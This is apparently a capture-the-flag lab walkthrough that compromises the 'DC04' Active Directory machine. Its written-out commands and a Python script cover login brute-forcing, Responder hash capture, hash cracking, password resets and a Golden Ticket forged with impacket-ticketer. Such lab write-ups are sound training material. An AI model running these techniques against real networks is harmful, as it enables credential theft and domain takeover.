DC04
Download it and unzip, and configure the networks like in this machine DC01.
Enumeration:
We will smb sweep to find its IP:
netexec smb 10.0.2.0/24
So we will add it to the /etc/hosts:
Now lets start nmap scan to scan all tcp ports:
sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local
Its an active directory machine, and we have a web server running on it.
We can dir and vhost fuzzing:
gobuster dir -u http://soupedecode.local -w /usr/share/wordlists/dirb/common.txt -t 16
But we have a lot of 403 with the same size, we can exclude the size in gobuster using --exclude-length:
Lets take a look at the server-info:
This file usually will discloses configuration information of the web server, we can find hidden directories or files or subdomains for example.
If we search a little bit we will find this subdomain.
Lets add it to the /etc/hosts.
LLMNR poisoning to get NTLMv2 of websvc:
We need credentials to authenticate:
Lets try some combinations of default credentials:
Invalid credentials with admin:admin.
Also there is not sqli.
Lets get the format of body of the request, to start brute forcing:
I wrote this simple script that will help us to brute force this login form using a simple wordlist:
import requests
url = 'http://heartbeat.soupedecode.local'
end_point = '/login.php'
session = requests.session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,'
'image/svg+xml,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '29',
'Origin': 'http://heartbeat.soupedecode.local',
'Connection': 'keep-alive',
'Referer': 'http://heartbeat.soupedecode.local/login.php',
'Upgrade-Insecure-Requests': '1',
'Priority': 'u=0, i'
}
with open('/usr/share/seclists/Passwords/UserPassCombo-Jay.txt', 'r') as wordlist:
words = wordlist.readlines()
for username in words:
username = username.strip()
for password in words:
password = password.strip()
data = f'username={username}&password={password}'
req = session.post(url=url + end_point, headers=headers, data=data)
if 'Invalid username' in req.text:
continue
else:
print(f'Valid Credentials: {username}:{password}')
break
I restarted this machine more than one time, so the IP changed as you progress in reading this blog to 10.0.2.33.
After a while we will get those credentials.
Here it is asking for IP, lets try SSRF:
I could not get to anything.
But lets start responder and try to capture the ntlmv2:
sudo reponder -I eth0 -dvw
We captured the websvc hash, we can crack it with hashcat:
hashcat websvc.hash /usr/share/wordlists/rockyou.txt
Here we have the password cracked.
Lets try to authenticate:
netexec smb soupedecode.local -u websvc -p jordan23
It says the password expired, so we can go to the logonui prompt to reset it:
The password has been change, lets try it out:
Finally we have valid credentials.
Lets collect the domain data and do some bloodhound enumeration:
bloodhound-python -u websvc -p Caesar3 -ns 10.0.2.33 -d soupedecode.local -dc dc01.soupedecode.local
For some reason we need to set a fake dns server for this to work:
dnschef --fakeip 10.0.2.33
And now re-execute the bloodhound command but instead our localhsot IP instead of the target IP:
Lets start bloodhound, but first we need to star the database that bloodhound can use:
sudo neo4j start
After that we will go to that link and login as neo4j:neo4j, and reset the password, and will use the same credentials to authenticate in bloodhound:
bloodhound
Drag and drop those json files into bloodhound:
I did not find anything could help us.
Nothing interesting in the home directory of the websvc user in the C share that we have read access to.
Move Laterally to rtina979:
Lets move on to dump other users:
netexec smb soupedecode.local -u websvc -p Caesar3 --users > temp.txt
Grep the users out of that temp file:
cat temp.txt | awk '{print $5}' > users.txt
If we extracted the description of the users, we will find this default password for a user:
Try to authenticate:
Also expired, so we can change the user using smbpasswd or impacket-changepasswd:
impacket-changepasswd 'soupedecode.local'/'rtina979'@'soupedecode.local' -newpass 'Caesar3!' -altuser websvc -altpass Caesar3
We changed the password successfully.
Privilege Escalatio via Golden Ticket attack:
Lets go back to the C share again to check the rtina979 home directory:
After doing enumeration in this share I found file called Report.rar:
smbclient \\\\10.0.2.33\\C -U 'rtina979%Caesar3!'
Downloading it and trying to extract it:
unrar x Report.rar
But its is encrypted with a password, we can use rar2john and then try to crack that hash to get the password for that archive:
rar2john Report.rar > report.hashjohn report.hash --wordlist=/usr/share/wordlists/rockyou.txt
Extract it again with that password:
We have a htm and bunch of js scripts.
If we open that .htm file in firefox:
We will that it is a penetration testing report:
After some reading we will find the krbtgt hash to this target system, and companies usually do not change krbtgt hash because changing the password is not a simple task.
Lets try to get a golden ticket with that krbtgt hash:
But before that we need to get the SID of the domain, so we can run impacket-lookupsid to get it:
impacket-lookupsid soupedecode.local/rtina979:'Caesar3!'@10.0.2.33
Now we will use impacket-ticketer to forge a ticket:
impacket-ticketer -nthash "0f55cdc40bd8f5814587f7e6b2f85e6f" -domain-sid "S-1-5-21-2986980474-46765180-2505414164" -domain "soupedecode.local" "administrator"
We need to export it to a variable called KRB5CCNAME, and try to authenticate via impacket-wmiexec:
export KRB5CCNAME=administrator.ccacheimpacket-wmiexec administrator@dc01.soupedecode.local -k -no-pass -dc-ip 10.0.2.33
We got clock skew too great because the time between our local machine is more than 5 minutes, so we can use ntpdate to sync the time, and rerun that impacket-wmiexec command.
Here is the root flag, you can find the user flag in the websvc home directory.
Last updated